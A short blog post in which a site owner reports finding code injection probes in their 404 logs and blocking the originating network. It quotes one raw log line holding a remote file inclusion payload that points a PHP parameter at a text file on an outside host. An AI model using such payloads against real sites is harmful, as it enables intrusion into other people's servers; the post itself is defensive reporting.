In order to troubleshoot a problem with my blog’s permalink structure, I had installed a plug-in for Wordpress to catch any Wordpress-specific 404 errors it generates and email that to me.

While it didn’t exactly help me with the permalink problem, it did reveal some code injection attempts being made against my blog.

For example, here’s one:

//includes/functions_install.php?vwar_root=[INJEKAN]http://www.mercycorps.org.hk/images/id.txt?? HTTP/1.1″ 404 36654 “-” “libwww-perl/5.65″

This is actually a code injection exploit for the phpBB web forum software package so it had no effect on my blog.

Since it should be blatantly obvious to any visitor that I don’t run phpBB, this was most likely an automated broad spectrum probe rather than a focused attempt.

I’ve since blocked the entire network that originated the attack.  The users of network 218.0.0.0/8 will just have to get by without reading my blog.  ;-)

Tags: , , , , ,
Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>


Bad Behavior has blocked 344 access attempts in the last 7 days.

Register Login